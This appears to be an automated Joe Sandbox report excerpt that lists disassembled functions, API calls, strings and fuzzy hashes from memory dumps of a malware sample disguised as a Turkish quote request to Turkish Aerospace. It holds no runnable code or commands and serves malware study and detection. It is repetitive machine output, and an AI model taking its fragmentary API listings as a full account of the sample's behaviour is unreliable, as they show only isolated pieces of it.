RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001E74CA

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: a493f59941fa36955b3f626c2c171d78485f2e4fadada581d57d4329890db852
Instruction ID: 3c4b45774a18fec1f9b4d53b00743bd947b942f7940dca7ce0f136c22abf95f0
Opcode Fuzzy Hash: a493f59941fa36955b3f626c2c171d78485f2e4fadada581d57d4329890db852
Instruction Fuzzy Hash: 75118EB5249754ABF7208F15EC0CB967BFCEB00B00F108569A616D61D1DB70E944DB60

Function 001EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001EACD3,?,00008000), ref: 001EB126

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 104d9a11e3e75ab4bc0711d475fc09ed41f7c5cd6200330f8f09fe0247ae9838
Instruction ID: 8d76d555a57f27f14c289111c06fe79e8ff66403ab31271894ecd4dfd8f0a845
Opcode Fuzzy Hash: 104d9a11e3e75ab4bc0711d475fc09ed41f7c5cd6200330f8f09fe0247ae9838
Instruction Fuzzy Hash: 98117970C44A68E7CF04AFE6E9A86EFBB78FF19720F118096E941B2181CB3056509B51

Function 001E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 001E2DD6
GetCurrentThreadId.KERNEL32 ref: 001E2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001E2DE4

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b13d52b0b6538fb104c50564d248678018292838083f976996f1a14f8f3bf774
Instruction ID: f1e9837e3b36c6253290564876bcf62e23192b4dd89c5dca685757a19ddcf84c
Opcode Fuzzy Hash: b13d52b0b6538fb104c50564d248678018292838083f976996f1a14f8f3bf774
Instruction Fuzzy Hash: 55E06D755816647AD7201BA3AC0DEEB3E6CFBA2BA1F104125F205D1080DEA08840C6B0

Function 00218863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00199639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00199693
Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996A2
Part of subcall function 00199639: BeginPath.GDI32(?), ref: 001996B9
Part of subcall function 00199639: SelectObject.GDI32(?,00000000), ref: 001996E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00218887
LineTo.GDI32(?,?,?), ref: 00218894
EndPath.GDI32(?), ref: 002188A4
StrokePath.GDI32(?), ref: 002188B2

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: dc1f47fe8bddcc6daeff8ddc39adffdade6562dd655d6b895819d0b2a41ca08b
Instruction ID: 9b618df6961a43dc3673bd74733e774c0de2bf1426d66989168ec6c63336d318
Opcode Fuzzy Hash: dc1f47fe8bddcc6daeff8ddc39adffdade6562dd655d6b895819d0b2a41ca08b
Instruction Fuzzy Hash: 01F05E3A081259FADB125F94BC0EFCE3F59AF2A311F248000FA11650E1CB755561CFE9

Function 001998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001998CC
SetTextColor.GDI32(?,?), ref: 001998D6
SetBkMode.GDI32(?,00000001), ref: 001998E9
GetStockObject.GDI32(00000005), ref: 001998F1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 4b51e290ae98ad0799c85b93c172a3d2d1e9c8007663107a00f6171457e4004a
Instruction ID: 7ed24c1a4871f3da675df05be6a54f6cdc7d52b65093c2742951bd09c95f1084
Opcode Fuzzy Hash: 4b51e290ae98ad0799c85b93c172a3d2d1e9c8007663107a00f6171457e4004a
Instruction Fuzzy Hash: 08E065352C4240BADF215B74BC0DBE93F11AB21335F24C21AF6F9541E1C77146409F11

Function 001E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 001E1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,001E11D9), ref: 001E163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001E11D9), ref: 001E1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,001E11D9), ref: 001E164F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 43f9706b65c444fccbdcebafca67e5ef4742d108aa3a3a33c1a5043d1de32413
Instruction ID: 703ae75c565b1787a5fa1d42ee03f9c05118eb06e13767f22999f5d93bcd3b3e
Opcode Fuzzy Hash: 43f9706b65c444fccbdcebafca67e5ef4742d108aa3a3a33c1a5043d1de32413
Instruction Fuzzy Hash: 3DE08639641211EBD7201FA1BD0DBCB3B7CBF68791F24C808F645C9080DB744540C750

Function 001DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 001DD858
GetDC.USER32(00000000), ref: 001DD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001DD882
ReleaseDC.USER32(?), ref: 001DD8A3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 31cab3f434ec0b4be761b805700291260dda0451a879e13bc2d9622758d21a73
Instruction ID: b8a312a6080d78b14d389e47153c7a06adf626b62204f81b82cb71b1d31e5b3d
Opcode Fuzzy Hash: 31cab3f434ec0b4be761b805700291260dda0451a879e13bc2d9622758d21a73
Instruction Fuzzy Hash: 16E01278840204DFCF419FA0E80C6ADBBB5FB58310F25D005F91AE7250CB354501AF50

Function 001DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 001DD86C
GetDC.USER32(00000000), ref: 001DD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001DD882
ReleaseDC.USER32(?), ref: 001DD8A3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: bf0c02a54abc171166626527477988940231deca18f47bb3870928ac0c4aa594
Instruction ID: 571d00ce62ddcd12e5311af759e3f99a48c28f7c8c662866f463052b3798d0b1
Opcode Fuzzy Hash: bf0c02a54abc171166626527477988940231deca18f47bb3870928ac0c4aa594
Instruction Fuzzy Hash: 7BE09A79C40204DFCF51AFA4E80C6AEBBB5BB68311B249449F95AE7250CB395A019F50

Function 001F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00187620: _wcslen.LIBCMT ref: 00187625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001F4ED4

Strings

LPT, xrefs: 001F4DFB
*, xrefs: 001F4E10

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 9cdd8438ba37efef1e0cea5e961f6251a988ec5ad5ac2d0be7bc796c748e708d
Instruction ID: 3ac04f17d7d6a8885c593f9069bcc4f1f722d55b5c8a29cfe684c674fab075c7
Opcode Fuzzy Hash: 9cdd8438ba37efef1e0cea5e961f6251a988ec5ad5ac2d0be7bc796c748e708d
Instruction Fuzzy Hash: 9E918175A002089FCB14DF58C484EBABBF1BF45314F198099E94A9F3A2D735EE85CB90

Function 001AE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001AE30D

Strings

pow, xrefs: 001AE2E5, 001AE302

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5bba3afa8d6bae5f196ecb6e131831e846819b19db7f98d5c19c58d36eaf0a91
Instruction ID: 117a93bece759ce18eaa06f84512300665341315e312d3dd1e7d9efb5174d019
Opcode Fuzzy Hash: 5bba3afa8d6bae5f196ecb6e131831e846819b19db7f98d5c19c58d36eaf0a91
Instruction Fuzzy Hash: 93518E65A0C202A6CF257764DD053F93BE8FF91780F308D99F0D6822E9EB35CC959A46

Function 00207771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(001D569E,00000000,?,0021CC08,?,00000000,00000000), ref: 002078DD

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

CharUpperBuffW.USER32(001D569E,00000000,?,0021CC08,00000000,?,00000000,00000000), ref: 0020783B

Strings

<s$, xrefs: 002077C8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s$
API String ID: 3544283678-3928034050
Opcode ID: 97b79f69ec349d47b3900dbd142ef91ff27ab942bfa9620061caa936264f7f4e
Instruction ID: 5575dc7c90b20635a6e86a3f654b5f52395ea98d4d34d2b4a828e7e055d98f98
Opcode Fuzzy Hash: 97b79f69ec349d47b3900dbd142ef91ff27ab942bfa9620061caa936264f7f4e
Instruction Fuzzy Hash: 50613A76924219ABCF04FBA4CC91DFDB378BF28700B544129E542A7092EF64AA15DBA0

Function 0019E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0019E1B1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 9cf4b09956c092b60c4d76233025f0d947eaf2a38432cb6a7b5d2460e7904d28
Instruction ID: f568d011f7208c93c890b5f41389180025b1c71475faec358f2bf16647449f5e
Opcode Fuzzy Hash: 9cf4b09956c092b60c4d76233025f0d947eaf2a38432cb6a7b5d2460e7904d28
Instruction Fuzzy Hash: A651F075904246DFDF19EF68C481AFA7BE8EF65311F24405AE8919F2D0DB349E42CBA0

Function 0019F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0019F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0019F2BB

Strings

@, xrefs: 0019F2AF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2d7c778334f64aa97c44cca117e52220ce0fd62803d5e0a056703761f108c10e
Instruction ID: 3fbb31d181fbd23dd27576c483b759f8b4e43092116dc3d58e0166b818d8b8a8
Opcode Fuzzy Hash: 2d7c778334f64aa97c44cca117e52220ce0fd62803d5e0a056703761f108c10e
Instruction Fuzzy Hash: 425147714087449BE320AF14EC86BAFBBF8FF95304F91885DF2D951195EB308629CB66

Function 00205745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002057E0
_wcslen.LIBCMT ref: 002057EC

Strings

CALLARGARRAY, xrefs: 002057E6, 002057EB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: ce826199dfbaa8904e9ec33e4e05034a3042e4643dde51aa70a485ef0b1a0e8c
Instruction ID: 67a03ae9e8d7d7e13279e0d57e79fd38698668da142f58830eea5acf3eda0ba7
Opcode Fuzzy Hash: ce826199dfbaa8904e9ec33e4e05034a3042e4643dde51aa70a485ef0b1a0e8c
Instruction Fuzzy Hash: CC419031A1061A9FCB04DFA9C8858BEBBB5FF69310F148069E905A7292E7709D91CF90

Function 001FD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001FD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001FD13A

Strings

|, xrefs: 001FD10B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: a03060fff5f825c36132c059a4b4283b3b84dac02c5bf49e2642a0c857b85927
Instruction ID: c57c5c1d97b99b27d4b3beb40fef9a9ee58dc1668c2ff28590fb2d546eca1d31
Opcode Fuzzy Hash: a03060fff5f825c36132c059a4b4283b3b84dac02c5bf49e2642a0c857b85927
Instruction Fuzzy Hash: A7312C75D00209ABCF15EFA4DC85AEEBFBAFF19300F100059F915A6162DB31AA16DF60

Function 0021356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00213621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0021365C

Strings

static, xrefs: 002135BC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 49f7a5a48a27dae76236487b6f257b30469494272efab76356eb867b284215f3
Instruction ID: beed33ef54d9d4b0cf9e4b578c3eea0715e8dbb5e167efc7b4c96addedf67ac4
Opcode Fuzzy Hash: 49f7a5a48a27dae76236487b6f257b30469494272efab76356eb867b284215f3
Instruction Fuzzy Hash: CC318071110205AADB10DF28DC80AFB73EEFFA8764F108619F96597180DB30ADA1CB64

Function 00214537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0021461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00214634

Strings

', xrefs: 0021458E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5b2ad80ae7dcc3ac8636eb659d0d446bd4daf0a1f971fb74845067db97b9dd65
Instruction ID: 03f79103a95c7f13b49d1b56e65703ba96e716dd5de180600ad1f98afb7ab595
Opcode Fuzzy Hash: 5b2ad80ae7dcc3ac8636eb659d0d446bd4daf0a1f971fb74845067db97b9dd65
Instruction Fuzzy Hash: 87314974A0030AAFDB14DF69C980BDA7BFAFF29300F54406AE908AB341D770A951CF90

Function 00183923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001C33A2

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00183A04

Strings

Line: , xrefs: 001C33EB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 83338ad26ebfb1bd58dcf6108479f56a03d7aec42cc855bb3123fa2d856558b9
